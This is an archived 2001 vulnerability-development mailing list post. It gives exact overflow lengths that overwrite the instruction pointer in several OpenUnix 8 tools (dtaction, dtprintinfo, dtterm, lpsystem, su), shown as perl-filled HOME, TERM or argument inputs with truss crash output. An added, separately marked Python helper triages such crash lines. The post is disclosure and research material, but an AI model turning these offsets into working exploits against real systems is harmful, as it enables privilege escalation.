Vulnerability Development mailing list archives
Fwd: Returned post -- OpenUnix 8 lpsystem , su and DT overflows lengths to eip
From: dotslash () snosoft com
Date: Fri, 26 Oct 2001 15:43:34 -0700
Sorry if this has already made it to this list... I have been getting lots of listserv replies; it doesn't seem to like my mail client.
I have had several people ask for the exact lengths on the OpenUnix 8 DT overflows. Below is some debugging information to help out. (Davor, sorry I sent this to a list... but for some reason I can't mail you)
-KF

# HOME=`perl -e 'print "A" x 1036'`
# export HOME
# truss dtaction a
Segmentation Fault
Incurred fault #6, FLTBOUNDS %pc = 0x41414141
siginfo: SIGSEGV SEGV_MAPERR addr=0x41414141
Received signal #11, SIGSEGV [default]
siginfo: SIGSEGV SEGV_MAPERR addr=0x41414141
*** process killed ***

# HOME=`perl -e 'print "A" x 1035'`
# export HOME
# truss dtaction a
Segmentation Fault
Incurred fault #6, FLTBOUNDS %pc = 0x00414141
siginfo: SIGSEGV SEGV_MAPERR addr=0x00414141
Received signal #11, SIGSEGV [default]
siginfo: SIGSEGV SEGV_MAPERR addr=0x00414141
*** process killed ***
------------------------------------------------------------
# HOME=`perl -e 'print "A" x 1036'`
# export HOME
# truss dtprintinfo
Segmentation Fault
Incurred fault #6, FLTBOUNDS %pc = 0x41414141
siginfo: SIGSEGV SEGV_MAPERR addr=0x41414141
Received signal #11, SIGSEGV [default]
siginfo: SIGSEGV SEGV_MAPERR addr=0x41414141
*** process killed ***

# HOME=`perl -e 'print "A" x 1035'`
# export HOME
# truss dtprintinfo
Incurred fault #6, FLTBOUNDS %pc = 0x00414141
siginfo: SIGSEGV SEGV_MAPERR addr=0x00414141
Received signal #11, SIGSEGV [default]
siginfo: SIGSEGV SEGV_MAPERR addr=0x00414141
*** process killed ***
------------------------------------------------------------
# HOME=`perl -e 'print "A" x 1035'`
# export HOME
# truss dtterm
Segmentation Fault
Incurred fault #6, FLTBOUNDS %pc = 0x00414141
siginfo: SIGSEGV SEGV_MAPERR addr=0x00414141
Received signal #11, SIGSEGV [default]
siginfo: SIGSEGV SEGV_MAPERR addr=0x00414141
*** process killed ***

# HOME=`perl -e 'print "A" x 1036'`
# export HOME
Incurred fault #6, FLTBOUNDS %pc = 0x41414141
siginfo: SIGSEGV SEGV_MAPERR addr=0x41414141
Received signal #11, SIGSEGV [default]
siginfo: SIGSEGV SEGV_MAPERR addr=0x41414141
*** process killed ***
------------------------------------------------------------
# truss lpsystem `perl -e 'print "A" x 2190'`
Incurred fault #6, FLTBOUNDS %pc = 0x08077B40
siginfo: SIGSEGV SEGV_MAPERR addr=0x00004141
Received signal #11, SIGSEGV [default]
siginfo: SIGSEGV SEGV_MAPERR addr=0x00004141
*** process killed ***

# truss lpsystem `perl -e 'print "A" x 2192'`
Incurred fault #6, FLTBOUNDS %pc = 0x08077B40
siginfo: SIGSEGV SEGV_MAPERR addr=0x41414141
Received signal #11, SIGSEGV [default]
siginfo: SIGSEGV SEGV_MAPERR addr=0x41414141
*** process killed ***
------------------------------------------------------------
# TERM=`perl -e 'print "A" x 1632'`
# export TERM
# truss /bin/su -
Incurred fault #6, FLTBOUNDS %pc = 0x00414141
siginfo: SIGSEGV SEGV_MAPERR addr=0x00414141
Received signal #11, SIGSEGV [default]
siginfo: SIGSEGV SEGV_MAPERR addr=0x00414141
*** process killed ***
------------------------------------------------------------
(no eip hit here)
# TERM=`perl -e 'print "A" x 1264'`
# export TERM
# /sbin/su -
# exit
# TERM=`perl -e 'print "A" x 1265'`
# export TERM
# /sbin/su -
Segmentation Fault - core dumped
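Added example, not part of the original post: a crash-triage helper that reads truss fault lines in the format shown above and separates crashes where the fill byte reached %pc (dtaction, dtprintinfo, dtterm, /bin/su) from crashes where only the faulting data address carries it (lpsystem). The function names and the SAMPLE text are constructed for illustration; the hex values are the ones in the post.

```python
import re

# Constructed sample: fault lines in the format of the truss output above.
SAMPLE = """\
Incurred fault #6, FLTBOUNDS %pc = 0x00414141
siginfo: SIGSEGV SEGV_MAPERR addr=0x00414141
Incurred fault #6, FLTBOUNDS %pc = 0x41414141
siginfo: SIGSEGV SEGV_MAPERR addr=0x41414141
Incurred fault #6, FLTBOUNDS %pc = 0x08077B40
siginfo: SIGSEGV SEGV_MAPERR addr=0x00004141
"""

PC_RE = re.compile(r"Incurred fault #\d+, \w+\s+%pc = 0x([0-9A-Fa-f]{8})")
ADDR_RE = re.compile(r"siginfo: SIGSEGV \w+ addr=0x([0-9A-Fa-f]{8})")

def filled_low_bytes(value, fill=0x41):
    """Count consecutive low-order bytes of a 32-bit value equal to fill."""
    n = 0
    while n < 4 and (value >> (8 * n)) & 0xFF == fill:
        n += 1
    return n

def classify(pc, addr, fill=0x41):
    """Label a crash by where the fill pattern shows up."""
    if filled_low_bytes(pc, fill) > 0:
        return "pc-tainted"        # input reached the program counter
    if filled_low_bytes(addr, fill) > 0:
        return "pointer-tainted"   # bad data pointer, pc still in program text
    return "unrelated"

def triage(text, fill=0x41):
    """Return (pc, addr, pc_bytes_filled, label) for each fault in text."""
    results, pc = [], None
    for line in text.splitlines():
        m = PC_RE.search(line)
        if m:
            pc = int(m.group(1), 16)
            continue
        m = ADDR_RE.search(line)
        if m and pc is not None:   # the repeated siginfo line is skipped
            addr = int(m.group(1), 16)
            results.append((pc, addr, filled_low_bytes(pc, fill),
                            classify(pc, addr, fill)))
            pc = None
    return results

if __name__ == "__main__":
    for pc, addr, n, label in triage(SAMPLE):
        print(f"pc=0x{pc:08X} addr=0x{addr:08X} pc_bytes={n} {label}")
```

A count of 3 (0x00414141) means the string's terminating NUL landed in the top byte of the little-endian value, which is why one more byte of input gives 0x41414141.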